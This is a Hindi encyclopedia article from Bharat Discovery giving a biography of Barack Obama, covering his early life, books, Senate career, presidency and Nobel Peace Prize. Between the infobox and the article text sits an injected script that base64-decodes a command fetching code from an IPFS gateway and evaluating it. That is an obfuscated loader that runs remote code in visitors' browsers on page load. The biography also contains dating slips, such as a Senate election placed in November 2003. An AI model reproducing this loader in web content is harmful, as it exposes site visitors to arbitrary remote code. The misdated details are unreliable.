बराक ओबामा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
बराक ओबामा
बराक हुसैन ओबामा
पूरा नाम बराक हुसैन ओबामा
अन्य नाम बराक ओबामा
जन्म 4 अगस्त, 1961
जन्म भूमि होनोलूलू, हवाई, संयुक्त राष्ट्र अमेरिका
पति/पत्नी मिशेल
संतान 2 बेटियाँ- मालिया, साशा
कार्य काल राष्ट्रपति (अमरीका)- 20 जनवरी, 2009 से 20 जनवरी, 2017 तक।
शिक्षा स्नातक
पुरस्कार-उपाधि नोबल शांति पुरस्कार
अन्य जानकारी अमरीका के राष्ट्रपति बराक हुसैन ओबामा मुख्य अतिथि के रूप में 26 जनवरी, 2015 को भारत आये थे।
अद्यतन‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बराक हुसैन ओबामा (अंग्रेज़ी: Barack Hussein Obama, जन्म- 4 अगस्त, 1961, अमरीका) अमरीका के प्रथम अश्वेत (अफ्रीकी अमरीकन) एवं पूर्व राष्ट्रपति हैं। वे अमरीका के 44वें राष्ट्रपति रहे हैं। उन्होंने 20 जनवरी, 2009 को राष्ट्रपति पद की शपथ ली थी। बराक ओबामा इलिनॉय प्रांत से कनिष्ठ सिनेटर तथा 2008 में अमरीका के राष्ट्रपति पद के लिए डेमोक्रैटिक पार्टी के उम्मीदवार थे।

जन्म एवं शिक्षा

बराक हुसैन ओबामा का जन्म 4 अगस्त, 1961, को अमरीका में हुआ था। होनोलूलू में जन्मे ओबामा कीनियाई मूल के अश्वेत पिता व अमरीकी मूल की माता की संतान हैं। उनका अधिकांश प्रारंभिक जीवन अमरीका के हवाई प्रांत में बीता। 6 से 10 वर्ष तक की अवस्था उन्होंने जकार्ता, इंडोनेशिया में अपनी माता और इंडोनेशियाई सौतेले पिता के संग बितायी। बाल्यकाल में उन्हें बैरी नाम से पुकारा जाता था। बाद में वे होनोलूलू वापस आकर अपनी ननिहाल में ही रहने लगे। 1995 में बराक ओबामा की माता का कैंसर से देहांत हो गया। ओबामा की पत्नी का नाम मिशेल है। उनका विवाह 1992 में हुआ जिससे उनकी दो पुत्रियाँ हैं, 9 वर्षीय मालिया तथा 6 वर्षीय साशा। 2 नवम्बर, 2008 को ओबामा का आरंभिक लालन पालन करने वाली उनकी दादी मेंडलिन दुनहम का 86 वर्ष की आयु में निधन हो गया। ओबामा ने हार्वड लॉ स्कूल से 1991 में स्नातक की फिर उन्होंने 1983 में बी.ए. की डिग्री प्राप्त की और बिजनेस इंटरनेशनल कॉर्पोरेशन में एक साल तक काम किया। बराक हुसैन ओबामा न्यूयॉर्क सार्वजनिक रुचि अनुसंधान में रहे।

लेखन कार्य

बराक हुसैन ओबामा ने दो लोकप्रिय पुस्तकें भी लिखी हैं, पहली पुस्तक 'ड्रीम्स फ्रॉम माई फादर', 'ए स्टोरी ऑफ रेस एंड इन्हेरिटेंस' का प्रकाशन लॉ स्कूल से स्नातक बनने के कुछ दिन बाद ही हुआ था। इस पुस्तक में उनके होनोलूलू व जकार्ता में बीते बालपन, लॉस एंजलिस व न्यूयॉर्क में व्यतीत कॉलेज जीवन तथा 80 के दशक में शिकागो शहर में सामुदायिक आयोजक के रूप में उनकी नौकरी के दिनों के संस्मरण हैं। पुस्तक पर आधारित ऑडियो बुक को 2006 में प्रतिष्ठित ग्रैमी पुरस्कार से सम्मानित किया गया है। उनकी दूसरी पुस्तक 'द ओडेसिटी ऑफ़ होप' मध्यावधि चुनाव के महज़ तीन हफ़्ते पहले अक्तूबर, 2006 में प्रकाशित हुई। यह किताब शीघ्र ही सर्वाधिक बिकने वाली पुस्तकों की सूची में शामिल हो गई। पुस्तक पर आधारित ऑडियो बुक को भी 2008 में प्रतिष्ठित ग्रैमी पुरस्कार से नवाजा गया है। शिकागो ट्रिब्यून के अनुसार पुस्तक के प्रचार के दौरान लोगों से मिलने के प्रभाव ने ही ओबामा को राष्ट्रपति पद के चुनाव में उतरने का हौसला दिया।

जीवन का सफर

बराक हुसैन ओबामा हार्वर्ड लॉ रिव्यू के पहले अफ्रीकी अमेरिकी अध्यक्ष भी रहे। 1997 से 2004 इलिनॉय सेनेट में तीन सेवाकाल पूर्ण करने के पूर्व ओबामा ने सामुदायिक आयोजक के रूप में कार्य किया है और नागरिक अधिकार अधिवक्ता के रूप में इन्होंने अभ्यास किया। 1992 से 2004 तक बराक ने शिकागो विधि विश्वविद्यालय में संवैधानिक कानून का अध्यापन भी किया। सन 2000 में अमेरिकन हाउस ऑफ रिप्रेसेंटेटिव में सीट हासिल करने में असफल होने के बाद जनवरी, 2003 में उन्होंने अमेरिकी सीनेट का रुख किया और मार्च, 2004 में प्राथमिक विजय हासिल की। नवंबर, 2003 में बराक ओबामा सीनेट के लिये चुने गये। 109वें काँग्रेस में अल्पसंख्य डेमोक्रैट सदस्य के रूप में उन्होंने पारंपरिक हथियारों पर नियंत्रण तथा संघीय कोष के प्रयोग में अधिक सार्वजनिक उत्तरदायित्व का समर्थन करते हुए विधेयकों के निर्माण में सहयोग दिया। बराक हुसैन ओबामा पूर्वी यूरोप, मध्य पूर्व और अफ्रीका की राजकीय यात्रा पर भी गये। 110वें काँग्रेस में लॉबिंग व चुनावी घोटालों, पर्यावरण के बदलाव, नाभिकीय आतंकवाद और युद्ध से लौटे अमेरिकी सैनिकों की देखरेख से संबंधित विधेयकों के निर्माण में उन्होंने सहयोग दिया।

राष्ट्रपति पद का सफर

5 जून, 2008 को यह लगभग तय हो गया था कि ओबामा की उम्मीदवारी के समर्थन में उनकी डेमोक्रेटिक प्रतिद्वंदी तथा पूर्व अमेरिकी प्रथम महिला हिलेरी क्लिंटन अपनी दावेदारी छोड़ देंगी। अमेरिकी इतिहास में ओबामा न केवल पाँचवें अफ्रीकी अमेरिकी सीनेटर (अमेरिकी सांसद) हैं बल्कि लोकप्रिय मतों से चुने जाने वाले तीसरे और सीनेट में नियुक्त एकमात्र अफ्रीकी अमेरिकी सीनेटर भी हैं।

नोबल शांति पुरस्कार

विश्वशांति में उल्लेखनीय योगदान के लिए बराक ओबामा को वर्ष 2009 के नोबेल शांति पुरस्कार के लिए चुना गया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख